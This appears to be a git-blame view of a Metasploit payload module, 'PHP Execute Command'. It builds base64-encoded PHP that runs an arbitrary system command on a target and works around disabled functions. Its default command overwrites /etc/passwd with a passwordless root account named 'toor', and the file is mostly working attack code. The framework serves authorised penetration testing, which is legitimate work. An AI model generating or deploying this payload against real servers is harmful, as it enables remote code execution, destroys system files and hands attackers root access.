2008-09-01 04:41:18 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2008-09-01 04:41:18 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/payload/php'
|
|
|
|
require 'msf/core/handler/bind_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
|
|
|
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2008-09-01 04:41:18 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Payload::Single
|
|
|
|
include Msf::Payload::Php
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'PHP Execute Command ',
|
|
|
|
'Description' => 'Execute a single system command',
|
|
|
|
'Author' => [ 'egypt' ],
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP
|
|
|
|
))
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('CMD', [ true, "The command string to execute", 'echo "toor::0:0:::/bin/bash">/etc/passwd' ]),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def php_exec_cmd
|
|
|
|
|
|
|
|
cmd = Rex::Text.encode_base64(datastore['CMD'])
|
|
|
|
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
|
|
|
shell = <<-END_OF_PHP_CODE
|
|
|
|
$c = base64_decode("#{cmd}");
|
|
|
|
#{php_preamble({:disabled_varname => dis})}
|
|
|
|
#{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}
|
|
|
|
END_OF_PHP_CODE
|
|
|
|
|
|
|
|
return Rex::Text.compress(shell)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return php_exec_cmd
|
|
|
|
end
|
2008-09-01 04:41:18 +00:00
|
|
|
|
2009-04-30 06:12:27 +00:00
|
|
|
end
|